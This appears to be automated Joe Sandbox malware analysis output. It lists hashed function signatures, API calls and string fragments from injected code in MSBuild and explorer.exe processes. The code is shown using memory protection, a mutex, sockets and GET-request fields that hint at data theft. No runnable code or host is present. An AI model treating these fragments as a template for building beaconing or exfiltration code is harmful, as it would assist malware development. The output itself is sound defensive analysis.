                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 013F7B7F
                                                                                                                                                                                                                                                                  • RTL: Resource at %p, xrefs: 013F7B8E
                                                                                                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 013F7BAC
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                                                                                  • API String ID: 0-871070163
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013F728C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 013F7294
                                                                                                                                                                                                                                                                  • RTL: Resource at %p, xrefs: 013F72A3
                                                                                                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 013F72C1
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                                                                                  • API String ID: 885266447-605551621
                                                                                                                                                                                                                                                                  • Opcode ID: f9a09b54bbfa6452034989f2765a3b1da3021dedf0bbc2597d6a019391e1a2e9
                                                                                                                                                                                                                                                                  • Instruction ID: 34522bae4ce5080b55cf74cc2c5f51ee3cbce8715008e60029ca49ab4420c58d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9a09b54bbfa6452034989f2765a3b1da3021dedf0bbc2597d6a019391e1a2e9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3410335700206ABD721DE29CC81FAAB7A5FB54718F10062DFA55AB680EB31F80687D1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                                                                                                                                  • String ID: +$-
                                                                                                                                                                                                                                                                  • API String ID: 1302938615-2137968064
                                                                                                                                                                                                                                                                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                                                                                                  • Instruction ID: 3792fe0f26eedb7b80460be3dfdcd9ca7b309cf9d133cead4673a4fab1d7681b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C91A071E0021A9BEB24DF6DC881ABEBBA5AF44B28F14451EED55E72C0EB309D458F11
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: $$@
                                                                                                                                                                                                                                                                  • API String ID: 0-1194432280
                                                                                                                                                                                                                                                                  • Opcode ID: 9e5c07b69784411bd376fa43a1f46d6c15a87763b17946cc24005acafcd01c65
                                                                                                                                                                                                                                                                  • Instruction ID: 5464c1d3d14b27863dce108a41d0962718a6929d6dad8f714e85c6e4d0a0a543
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e5c07b69784411bd376fa43a1f46d6c15a87763b17946cc24005acafcd01c65
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58810C71D00269DBDB35DB58CD44BEEB7B8AB48718F0041DAEA19B7690D7705E84CFA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                  Execution Coverage:2.5%
                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                  Signature Coverage:5.5%
                                                                                                                                                                                                                                                                  Total number of Nodes:454
                                                                                                                                                                                                                                                                  Total number of Limit Nodes:16

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2943761942.000000000B330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B330000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_b330000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Sleepgetaddrinforecvsetsockopt
                                                                                                                                                                                                                                                                  • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                                                                                                                                                                                                  • API String ID: 1843418094-1117930895
                                                                                                                                                                                                                                                                  • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                                                                                                                                                  • Instruction ID: 8b9393cafef8be9425489851a46a606dd816515158ff4e89f39f22392a49c674
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31527230A14B088FCB69EF68C4957EAB7E1FB54300F504A2EC4AFD7246DE74A645CB45
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2943761942.000000000B330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B330000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_b330000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$CreateRead
                                                                                                                                                                                                                                                                  • String ID: `
                                                                                                                                                                                                                                                                  • API String ID: 3388366904-2679148245
                                                                                                                                                                                                                                                                  • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                                                                                                                                                  • Instruction ID: 1bcfc0da44961f02bc917b31c8bff9fd20d8a63b194fcea211ae3e0377cd3e8f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56225A70A18A0D9FDB59DF28C4997AAF7F1FB98300F40462EE55EE3650DB30A552CB81
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 447 b412e12-b412e38 448 b412e45-b412e6e NtProtectVirtualMemory 447->448 449 b412e40 call b411942 447->449 450 b412e70-b412e7c 448->450 451 b412e7d-b412e8f 448->451 449->448
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • NtProtectVirtualMemory.NTDLL ref: 0B412E67
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2943761942.000000000B330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B330000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_b330000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2706961497-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                                                                                                                                                  • Instruction ID: 7bf8c537180fc05594b3faef2de416cd9bddb0e6da97cfc9a9f874ac314ff053
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D801B530628B484F8784EF6CD481226B7E4FBDD314F000B3EE59AC3250D770C5414742
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 452 b412e0a-b412e6e call b411942 NtProtectVirtualMemory 455 b412e70-b412e7c 452->455 456 b412e7d-b412e8f 452->456
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • NtProtectVirtualMemory.NTDLL ref: 0B412E67
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2943761942.000000000B330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B330000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_b330000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2706961497-0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ObtainUserAgentString.URLMON ref: 0B40C9A0
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2943761942.000000000B330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B330000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_b330000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AgentObtainStringUser
                                                                                                                                                                                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                                                                                                  • API String ID: 2681117516-319646191
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ObtainUserAgentString.URLMON ref: 0B40C9A0
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2943761942.000000000B330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B330000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_b330000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AgentObtainStringUser
                                                                                                                                                                                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                                                                                                  • API String ID: 2681117516-319646191
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  control_flow_graph 232 b408b66-b408b68 233 b408b93-b408bb8 232->233 234 b408b6a-b408b6b 232->234 237 b408bbb-b408bbc 233->237 235 b408b6d-b408b71 234->235 236 b408bbe-b408c22 call b40f612 call b411942 * 2 234->236 235->237 238 b408b73-b408b92 235->238 246 b408c28-b408c2b 236->246 247 b408cdc 236->247 237->236 238->233 246->247 248 b408c31-b408cd3 call b413da4 call b413022 call b4133e2 call b413022 call b4133e2 CreateMutexW 246->248 249 b408cde-b408cf6 247->249 248->247 263 b408cd5-b408cda 248->263 263->249
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2943761942.000000000B330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B330000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_b330000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateMutex
                                                                                                                                                                                                                                                                  • String ID: .dll$el32$kern
                                                                                                                                                                                                                                                                  • API String ID: 1964310414-1222553051
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2943761942.000000000B330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B330000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_b330000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateMutex
                                                                                                                                                                                                                                                                  • String ID: .dll$el32$kern
                                                                                                                                                                                                                                                                  • API String ID: 1964310414-1222553051
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  control_flow_graph 401 b40e72e-b40e768 402 b40e788-b40e7ab connect 401->402 403 b40e76a-b40e782 call b411942 401->403 403->402
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2943761942.000000000B330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B330000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_b330000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: connect
                                                                                                                                                                                                                                                                  • String ID: conn$ect
                                                                                                                                                                                                                                                                  • API String ID: 1959786783-716201944
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  control_flow_graph 406 b40e732-b40e768 407 b40e788-b40e7ab connect 406->407 408 b40e76a-b40e782 call b411942 406->408 408->407
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2943761942.000000000B330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B330000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_b330000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: connect
                                                                                                                                                                                                                                                                  • String ID: conn$ect
                                                                                                                                                                                                                                                                  • API String ID: 1959786783-716201944
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  control_flow_graph 411 b40e6b2-b40e6e5 412 b40e705-b40e72d send 411->412 413 b40e6e7-b40e6ff call b411942 411->413 413->412
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2943761942.000000000B330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B330000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_b330000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: send
                                                                                                                                                                                                                                                                  • String ID: send
                                                                                                                                                                                                                                                                  • API String ID: 2809346765-2809346765
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  control_flow_graph 416 b40e5b2-b40e5ea 417 b40e60a-b40e62b socket 416->417 418 b40e5ec-b40e604 call b411942 416->418 418->417
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2943761942.000000000B330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B330000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_b330000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: socket
                                                                                                                                                                                                                                                                  • String ID: sock
                                                                                                                                                                                                                                                                  • API String ID: 98920635-2415254727
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  control_flow_graph 421 b4062dd-b406320 call b411942 424 b406326 421->424 425 b4063fa-b40640e 421->425 426 b406328-b406339 SleepEx 424->426 426->426 427 b40633b-b406341 426->427 428 b406343-b406349 427->428 429 b40634b-b406352 427->429 428->429 430 b40635c-b40636a call b410f12 428->430 431 b406370-b406376 429->431 432 b406354-b40635a 429->432 430->431 434 b4063b7-b4063bd 431->434 435 b406378-b40637e 431->435 432->430 432->431 436 b4063d4-b4063db 434->436 437 b4063bf-b4063cf call b406e72 434->437 435->434 439 b406380-b40638a 435->439 436->426 441 b4063e1-b4063f5 call b4060f2 436->441 437->436 439->434 442 b40638c-b4063b1 call b407432 439->442 441->426 442->434
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2943761942.000000000B330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B330000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_b330000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  control_flow_graph 457 b406412-b406446 call b411942 460 b406473-b40647d 457->460 461 b406448-b406472 call b413c9e CreateThread 457->461
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2943761942.000000000B330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B330000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_b330000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2422867632-0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2947257254.000000000E820000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E820000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_e820000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                                                                                                                                                                  • API String ID: 0-355182820
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2947257254.000000000E820000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E820000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_e820000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: $Snif$f fr$om:
                                                                                                                                                                                                                                                                  • API String ID: 0-3434893486
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2947257254.000000000E820000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E820000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_e820000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                                                                                                  • API String ID: 0-319646191
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2947257254.000000000E820000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E820000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_e820000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: .$l$l$t
                                                                                                                                                                                                                                                                  • API String ID: 0-168566397
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2947257254.000000000E820000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E820000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_e820000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: .$l$l$t
                                                                                                                                                                                                                                                                  • API String ID: 0-168566397
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%